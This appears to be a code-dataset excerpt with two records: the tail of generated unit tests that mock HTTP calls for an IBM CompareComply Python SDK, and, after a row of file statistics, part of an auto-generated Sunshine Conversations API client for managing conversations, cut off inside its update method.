        responses.add(responses.DELETE, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.delete_feedback(**body)

    def construct_full_body(self):
        return {"feedback_id": "string1", "model": "string1"}

    def construct_required_body(self):
        return {"feedback_id": "string1"}
# endregion
##############################################################################
# End of Service: Feedback
##############################################################################
##############################################################################
# Start of Service: Batches
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for create_batch
# -----------------------------------------------------------------------------
class TestCreateBatch:
    """Generated unit tests for CompareComplyV1.create_batch."""

    @responses.activate
    def test_create_batch_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_BatchStatus_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_create_batch_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_BatchStatus_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_create_batch_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_BatchStatus_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/batches"

    def add_mock_response(self, url, response):
        responses.add(responses.POST, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.create_batch(**body)

    def construct_full_body(self):
        # "model" is the only optional parameter for this operation.
        return dict(
            function="string1",
            input_credentials_file=tempfile.NamedTemporaryFile(),
            input_bucket_location="string1",
            input_bucket_name="string1",
            output_credentials_file=tempfile.NamedTemporaryFile(),
            output_bucket_location="string1",
            output_bucket_name="string1",
            model="string1",
        )

    def construct_required_body(self):
        return dict(
            function="string1",
            input_credentials_file=tempfile.NamedTemporaryFile(),
            input_bucket_location="string1",
            input_bucket_name="string1",
            output_credentials_file=tempfile.NamedTemporaryFile(),
            output_bucket_location="string1",
            output_bucket_name="string1",
        )
# -----------------------------------------------------------------------------
# Test Class for list_batches
# -----------------------------------------------------------------------------
class TestListBatches:
    """Generated unit tests for CompareComplyV1.list_batches."""

    @responses.activate
    def test_list_batches_response(self):
        # No parameters are defined for this operation.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_Batches_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_list_batches_required_response(self):
        # Required-only payload (also empty) must still call once.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_Batches_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_list_batches_empty(self):
        # Listing has no required params, so an empty call still succeeds.
        check_empty_response(self)
        assert len(responses.calls) == 1

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/batches"

    def add_mock_response(self, url, response):
        responses.add(responses.GET, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.list_batches(**body)

    def construct_full_body(self):
        return {}

    def construct_required_body(self):
        return {}
# -----------------------------------------------------------------------------
# Test Class for get_batch
# -----------------------------------------------------------------------------
class TestGetBatch:
    """Generated unit tests for CompareComplyV1.get_batch."""

    @responses.activate
    def test_get_batch_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_BatchStatus_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_get_batch_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_BatchStatus_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_get_batch_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_BatchStatus_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        # batch_id is interpolated into the resource path.
        return base_url + "/v1/batches/{0}".format(body["batch_id"])

    def add_mock_response(self, url, response):
        responses.add(responses.GET, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.get_batch(**body)

    def construct_full_body(self):
        return {"batch_id": "string1"}

    def construct_required_body(self):
        return {"batch_id": "string1"}
# -----------------------------------------------------------------------------
# Test Class for update_batch
# -----------------------------------------------------------------------------
class TestUpdateBatch:
    """Generated unit tests for CompareComplyV1.update_batch."""

    @responses.activate
    def test_update_batch_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_BatchStatus_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_update_batch_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_BatchStatus_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_update_batch_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_BatchStatus_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        # batch_id is interpolated into the resource path.
        return base_url + "/v1/batches/{0}".format(body["batch_id"])

    def add_mock_response(self, url, response):
        responses.add(responses.PUT, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.update_batch(**body)

    def construct_full_body(self):
        return {"batch_id": "string1", "action": "string1", "model": "string1"}

    def construct_required_body(self):
        return {"batch_id": "string1", "action": "string1"}
# endregion
##############################################################################
# End of Service: Batches
##############################################################################
def check_empty_required_params(obj, response):
    """Assert that the operation raises ValueError when every required
    parameter is present but set to None.

    Args:
        obj: The generated test-class instance under test
        response: Mock response payload forwarded to send_request
    """
    # Null out every field of a fully-populated body.
    body = {k: None for k in obj.construct_full_body()}
    raised = False
    try:
        send_request(obj, body, response)
    except ValueError:
        raised = True
    assert raised, "expected ValueError for None-valued required params"
def check_missing_required_params(obj):
    """Assert that the operation raises TypeError when required parameters
    are omitted entirely.

    Args:
        obj: The generated test-class instance under test
    """
    # The URL must be pre-built because make_url needs the full body.
    url = obj.make_url(obj.construct_full_body())
    raised = False
    try:
        send_request(obj, {}, {}, url=url)
    except TypeError:
        raised = True
    assert raised, "expected TypeError for missing required params"
def check_empty_response(obj):
    """Assert that the operation tolerates an empty request, returning an
    empty response.

    Args:
        obj: The generated test-class instance under test
    """
    url = obj.make_url(obj.construct_full_body())
    send_request(obj, {}, {}, url=url)
def send_request(obj, body, response, url=None):
    """Register a mock for the request, invoke the service, and check that
    the mocked response is returned unchanged.

    Args:
        obj: The generated test-class instance under test
        body: Dict of fake parameters used to call the service
        response: Mock response payload to register and expect back
        url: Optional pre-built URL; derived from *body* when omitted
    """
    target = url if url else obj.make_url(body)
    obj.add_mock_response(target, response)
    result = obj.call_service(body)
    # The recorded call must hit the mocked URL and echo the payload.
    assert responses.calls[0].request.url.startswith(target)
    assert result.get_result() == response
####################
## Mock Responses ##
####################
# JSON payloads served by the `responses` mocks, one per operation.
# NOTE: the original file assigned fake_response_BatchStatus_json three
# times with identical values; the redundant duplicates are removed here.
fake_response__json = None
fake_response_HTMLReturn_json = """{"num_pages": "fake_num_pages", "author": "fake_author", "publication_date": "fake_publication_date", "title": "fake_title", "html": "fake_html"}"""
fake_response_ClassifyReturn_json = """{"document": {"title": "fake_title", "html": "fake_html", "hash": "fake_hash", "label": "fake_label"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "elements": [], "effective_dates": [], "contract_amounts": [], "termination_dates": [], "contract_types": [], "contract_terms": [], "payment_terms": [], "contract_currencies": [], "tables": [], "document_structure": {"section_titles": [], "leading_sentences": [], "paragraphs": []}, "parties": []}"""
fake_response_TableReturn_json = """{"document": {"html": "fake_html", "title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "tables": []}"""
fake_response_CompareReturn_json = """{"model_id": "fake_model_id", "model_version": "fake_model_version", "documents": [], "aligned_elements": [], "unaligned_elements": []}"""
fake_response_FeedbackReturn_json = """{"feedback_id": "fake_feedback_id", "user_id": "fake_user_id", "comment": "fake_comment", "created": "2017-05-16T13:56:54.957Z", "feedback_data": {"feedback_type": "fake_feedback_type", "document": {"title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "location": {"begin": 5, "end": 3}, "text": "fake_text", "original_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "updated_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "pagination": {"refresh_cursor": "fake_refresh_cursor", "next_cursor": "fake_next_cursor", "refresh_url": "fake_refresh_url", "next_url": "fake_next_url", "total": 5}}}"""
fake_response_FeedbackList_json = """{"feedback": []}"""
fake_response_GetFeedback_json = """{"feedback_id": "fake_feedback_id", "created": "2017-05-16T13:56:54.957Z", "comment": "fake_comment", "feedback_data": {"feedback_type": "fake_feedback_type", "document": {"title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "location": {"begin": 5, "end": 3}, "text": "fake_text", "original_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "updated_labels": {"types": [], "categories": [], "modification": "fake_modification"}, "pagination": {"refresh_cursor": "fake_refresh_cursor", "next_cursor": "fake_next_cursor", "refresh_url": "fake_refresh_url", "next_url": "fake_next_url", "total": 5}}}"""
fake_response_FeedbackDeleted_json = """{"status": 6, "message": "fake_message"}"""
fake_response_BatchStatus_json = """{"function": "fake_function", "input_bucket_location": "fake_input_bucket_location", "input_bucket_name": "fake_input_bucket_name", "output_bucket_location": "fake_output_bucket_location", "output_bucket_name": "fake_output_bucket_name", "batch_id": "fake_batch_id", "document_counts": {"total": 5, "pending": 7, "successful": 10, "failed": 6}, "status": "fake_status", "created": "2017-05-16T13:56:54.957Z", "updated": "2017-05-16T13:56:54.957Z"}"""
fake_response_Batches_json = """{"batches": []}"""
| 38.331193
| 756
| 0.508293
| 3,752
| 41,781
| 5.414446
| 0.079158
| 0.033079
| 0.021265
| 0.035442
| 0.847207
| 0.838297
| 0.830322
| 0.820231
| 0.814226
| 0.800148
| 0
| 0.015074
| 0.209306
| 41,781
| 1,089
| 757
| 38.366391
| 0.599861
| 0.253225
| 0
| 0.748851
| 0
| 0.013783
| 0.194857
| 0.046665
| 0
| 0
| 0
| 0
| 0.061256
| 1
| 0.153139
| false
| 0
| 0.013783
| 0
| 0.258806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f023ac1df51cf1ef5826d1574447a0855e92b54b
| 32,745
|
py
|
Python
|
sunshine_conversations_client/api/conversations_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 4
|
2020-09-27T14:28:25.000Z
|
2022-02-02T13:51:29.000Z
|
sunshine_conversations_client/api/conversations_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 3
|
2021-09-30T18:18:58.000Z
|
2021-12-04T07:55:23.000Z
|
sunshine_conversations_client/api/conversations_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 5
|
2020-11-07T02:08:18.000Z
|
2021-12-07T17:10:23.000Z
|
# coding: utf-8
"""
Sunshine Conversations API
The version of the OpenAPI document: 9.4.5
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sunshine_conversations_client.api_client import ApiClient
from sunshine_conversations_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class ConversationsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Store the supplied API client, creating a default one when absent."""
    self.api_client = api_client if api_client is not None else ApiClient()
def create_conversation(self, app_id, conversation_create_body, **kwargs):  # noqa: E501
    """Create Conversation  # noqa: E501

    Create a conversation for the specified user(s).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.create_conversation(app_id, conversation_create_body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param ConversationCreateBody conversation_create_body: (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: ConversationResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # The plain variant returns only the deserialized body, not the
    # (data, status, headers) tuple.
    kwargs = dict(kwargs, _return_http_data_only=True)
    return self.create_conversation_with_http_info(app_id, conversation_create_body, **kwargs)  # noqa: E501
def create_conversation_with_http_info(self, app_id, conversation_create_body, **kwargs):  # noqa: E501
    """Create Conversation  # noqa: E501

    Create a conversation for the specified user(s).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.create_conversation_with_http_info(app_id, conversation_create_body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param ConversationCreateBody conversation_create_body: (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Snapshot of the named arguments plus the raw kwargs dict.
    local_var_params = locals()

    all_params = [
        'app_id',
        'conversation_create_body'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject any keyword argument the generated API does not recognize.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_conversation" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'app_id' is set
    if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['app_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `create_conversation`")  # noqa: E501
    # verify the required parameter 'conversation_create_body' is set
    if self.api_client.client_side_validation and ('conversation_create_body' not in local_var_params or  # noqa: E501
                                                   local_var_params['conversation_create_body'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `conversation_create_body` when calling `create_conversation`")  # noqa: E501

    collection_formats = {}

    # Path template substitution: {appId} in the endpoint URL.
    path_params = {}
    if 'app_id' in local_var_params:
        path_params['appId'] = local_var_params['app_id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request body is the create payload itself.
    body_params = None
    if 'conversation_create_body' in local_var_params:
        body_params = local_var_params['conversation_create_body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

    return self.api_client.call_api(
        '/v2/apps/{appId}/conversations', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ConversationResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_conversation(self, app_id, conversation_id, **kwargs):  # noqa: E501
    """Delete Conversation  # noqa: E501

    Delete an entire conversation record, along with its messages and attachments. Note that the default conversation cannot be deleted, but the messages contained [can be](#deleteAllMessages).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_conversation(app_id, conversation_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param str conversation_id: Identifies the conversation. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # The plain variant returns only the deserialized body, not the
    # (data, status, headers) tuple.
    kwargs = dict(kwargs, _return_http_data_only=True)
    return self.delete_conversation_with_http_info(app_id, conversation_id, **kwargs)  # noqa: E501
def delete_conversation_with_http_info(self, app_id, conversation_id, **kwargs):  # noqa: E501
    """Delete Conversation  # noqa: E501

    Delete an entire conversation record, along with its messages and attachments. Note that the default conversation cannot be deleted, but the messages contained [can be](#deleteAllMessages).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_conversation_with_http_info(app_id, conversation_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param str conversation_id: Identifies the conversation. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(object, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Snapshot of the named arguments plus the raw kwargs dict.
    local_var_params = locals()

    all_params = [
        'app_id',
        'conversation_id'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject any keyword argument the generated API does not recognize.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_conversation" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'app_id' is set
    if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['app_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `delete_conversation`")  # noqa: E501
    # verify the required parameter 'conversation_id' is set
    if self.api_client.client_side_validation and ('conversation_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['conversation_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `conversation_id` when calling `delete_conversation`")  # noqa: E501

    collection_formats = {}

    # Path template substitution: {appId} and {conversationId}.
    path_params = {}
    if 'app_id' in local_var_params:
        path_params['appId'] = local_var_params['app_id']  # noqa: E501
    if 'conversation_id' in local_var_params:
        path_params['conversationId'] = local_var_params['conversation_id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # DELETE sends no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

    return self.api_client.call_api(
        '/v2/apps/{appId}/conversations/{conversationId}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_conversation(self, app_id, conversation_id, **kwargs):  # noqa: E501
    """Get Conversation  # noqa: E501

    Fetches an individual conversation.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_conversation(app_id, conversation_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param str conversation_id: Identifies the conversation. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: ConversationResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # The plain variant returns only the deserialized body, not the
    # (data, status, headers) tuple.
    kwargs = dict(kwargs, _return_http_data_only=True)
    return self.get_conversation_with_http_info(app_id, conversation_id, **kwargs)  # noqa: E501
def get_conversation_with_http_info(self, app_id, conversation_id, **kwargs):  # noqa: E501
    """Get Conversation  # noqa: E501

    Fetches an individual conversation.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_conversation_with_http_info(app_id, conversation_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param str conversation_id: Identifies the conversation. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Snapshot of the named arguments plus the raw kwargs dict.
    local_var_params = locals()

    all_params = [
        'app_id',
        'conversation_id'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject any keyword argument the generated API does not recognize.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_conversation" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'app_id' is set
    if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['app_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `get_conversation`")  # noqa: E501
    # verify the required parameter 'conversation_id' is set
    if self.api_client.client_side_validation and ('conversation_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['conversation_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `conversation_id` when calling `get_conversation`")  # noqa: E501

    collection_formats = {}

    # Path template substitution: {appId} and {conversationId}.
    path_params = {}
    if 'app_id' in local_var_params:
        path_params['appId'] = local_var_params['app_id']  # noqa: E501
    if 'conversation_id' in local_var_params:
        path_params['conversationId'] = local_var_params['conversation_id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET sends no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

    return self.api_client.call_api(
        '/v2/apps/{appId}/conversations/{conversationId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ConversationResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_conversations(self, app_id, filter, **kwargs):  # noqa: E501
    """List Conversations  # noqa: E501

    Lists all conversations that a user is part of. This API is paginated through [cursor pagination](#section/Introduction/API-pagination-and-records-limits). ```shell /v2/apps/:appId/conversations?filter[userId]=42589ad070d43be9b00ff7e5 ```  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_conversations(app_id, filter, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param ConversationListFilter filter: Contains parameters for filtering the results. (required)
    :param Page page: Contains parameters for applying cursor pagination.
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: ConversationListResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # The plain variant returns only the deserialized body, not the
    # (data, status, headers) tuple.
    kwargs = dict(kwargs, _return_http_data_only=True)
    return self.list_conversations_with_http_info(app_id, filter, **kwargs)  # noqa: E501
def list_conversations_with_http_info(self, app_id, filter, **kwargs):  # noqa: E501
    """List Conversations  # noqa: E501

    Lists all conversations that a user is part of. This API is paginated through [cursor pagination](#section/Introduction/API-pagination-and-records-limits). ```shell /v2/apps/:appId/conversations?filter[userId]=42589ad070d43be9b00ff7e5 ```  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_conversations_with_http_info(app_id, filter, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param ConversationListFilter filter: Contains parameters for filtering the results. (required)
    :param Page page: Contains parameters for applying cursor pagination.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(ConversationListResponse, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Snapshot of the named arguments plus the raw kwargs dict.
    local_var_params = locals()

    all_params = [
        'app_id',
        'filter',
        'page'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject any keyword argument the generated API does not recognize.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_conversations" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'app_id' is set
    if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['app_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `list_conversations`")  # noqa: E501
    # verify the required parameter 'filter' is set
    if self.api_client.client_side_validation and ('filter' not in local_var_params or  # noqa: E501
                                                   local_var_params['filter'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `filter` when calling `list_conversations`")  # noqa: E501

    collection_formats = {}

    # Path template substitution: {appId}.
    path_params = {}
    if 'app_id' in local_var_params:
        path_params['appId'] = local_var_params['app_id']  # noqa: E501

    # Optional cursor pagination and required filter go in the query string.
    query_params = []
    if 'page' in local_var_params and local_var_params['page'] is not None:  # noqa: E501
        query_params.append(('page', local_var_params['page']))  # noqa: E501
    if 'filter' in local_var_params and local_var_params['filter'] is not None:  # noqa: E501
        query_params.append(('filter', local_var_params['filter']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET sends no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

    return self.api_client.call_api(
        '/v2/apps/{appId}/conversations', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ConversationListResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_conversation(self, app_id, conversation_id, conversation_update_body, **kwargs):  # noqa: E501
    """Update Conversation  # noqa: E501

    Updates a conversation record.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_conversation(app_id, conversation_id, conversation_update_body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param str conversation_id: Identifies the conversation. (required)
    :param ConversationUpdateBody conversation_update_body: (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: ConversationResponse
        If the method is called asynchronously,
        returns the request thread.
    """
